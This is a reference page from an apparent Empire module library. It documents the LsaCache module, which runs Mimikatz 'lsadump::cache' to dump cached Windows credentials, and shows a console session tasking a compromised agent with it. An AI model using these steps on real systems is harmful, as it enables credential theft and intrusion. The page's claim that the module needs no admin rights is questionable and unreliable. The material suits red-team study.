LsaCache - Empire Module
This page contains detailed information about how to use the csharp/Sharpsploit.Credentials/LsaCache Empire module. For list of all Empire modules, visit the Empire Module Library.
Module Overview
Name: LsaCache
Module: csharp/Sharpsploit.Credentials/LsaCache
Source code:
empire/server/modules/csharp/Sharpsploit.Credentials.Covenant.yaml#L929
Language: C#
Needs admin: No
OPSEC safe: No
Background: No
The LsaCache module executes the 'privilege::debug lsadump::cache' Mimikatz command.
This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.
Note that the LsaCache module does not need administrative privileges to work properly which means that a normal user can run this module.
Required Module Options
This is a list of options that are required by the LsaCache module:
Agent
Agent to run module on.
DotNetVersion
.NET version to compile against.
Default value: Net35
.
Suggested values: Net35
, Net40
.
LsaCache Example Usage
Here's an example of how to use the LsaCache module in the Empire client console:
[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule csharp/Sharpsploit.Credentials/LsaCache
Author cobbr_io
Background False
Description Execute the 'privilege::debug lsadump::cache' Mimikatz command.
Language csharp
Name csharp/Sharpsploit.Credentials/LsaCache
NeedsAdmin False
OpsecSafe False
,Record Options-,-------,----------,---------------------------------,
| Name | Value | Required | Description |
|---------------|-------|----------|---------------------------------|
| Agent | | True | Agent to run module on. |
|---------------|-------|----------|---------------------------------|
| DotNetVersion | Net35 | True | .NET version to compile against |
'---------------'-------'----------'---------------------------------'
(Empire: usemodule/csharp/Sharpsploit.Credentials/LsaCache) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/csharp/Sharpsploit.Credentials/LsaCache) > set DotNetVersion Net35
[*] Set DotNetVersion to Net35
(Empire: usemodule/csharp/Sharpsploit.Credentials/LsaCache) > execute
[!] Error: csharpserver plugin not running
Note: This module requires csharpserver plugin to be running on our system. If this plugin is not running, the error message "[!] Error: csharp server plugin not running
" is thrown on the console. To fix the error, start the csharpserver plugin and re-run the module:
(Empire: usemodule/csharp/Sharpsploit.Credentials/LsaCache) > useplugin csharpserver
,Record Options--,----------,----------------------------------,
| Name | Value | Required | Description |
|--------|-------|----------|----------------------------------|
| status | start | True | Start/stop the Empire C# server. |
'--------'-------'----------'----------------------------------'
(Empire: useplugin/csharpserver) > execute
[*] Starting Empire C# server
(Empire: useplugin/csharpserver) > back
(Empire: usemodule/csharp/Sharpsploit.Credentials/LsaCache) > execute
[*] Tasked Y4LHEV83 to run Task 1
...
Now wait for the results to come.
Author
- cobbr_io
References
- https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/csharp/Sharpsploit.Credentials.Covenant.yaml#L929
- https://twitter.com/cobbr_io
See Also
Check also the following modules related to this module:
- csharp/Sharpsploit.Credentials/MakeToken
- csharp/Sharpsploit.Credentials/GetSystem
- csharp/Sharpsploit.Credentials/ImpersonateProcess
- csharp/Sharpsploit.Credentials/ImpersonateUser
- csharp/Sharpsploit.Credentials/BypassUACGrunt
- csharp/Sharpsploit.Credentials/BypassUACCommand
- csharp/Sharpsploit.Credentials/RevertToSelf
- csharp/Sharpsploit.Credentials/LogonPasswords
- csharp/Sharpsploit.Credentials/LsaSecrets
- csharp/Sharpsploit.Credentials/SamDump
- csharp/Sharpsploit.Credentials/Wdigest
- csharp/Sharpsploit.Credentials/DCSync
- csharp/Sharpsploit.Credentials/Mimikatz
- csharp/Sharpsploit.Credentials/SafetyKatz
Version
This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.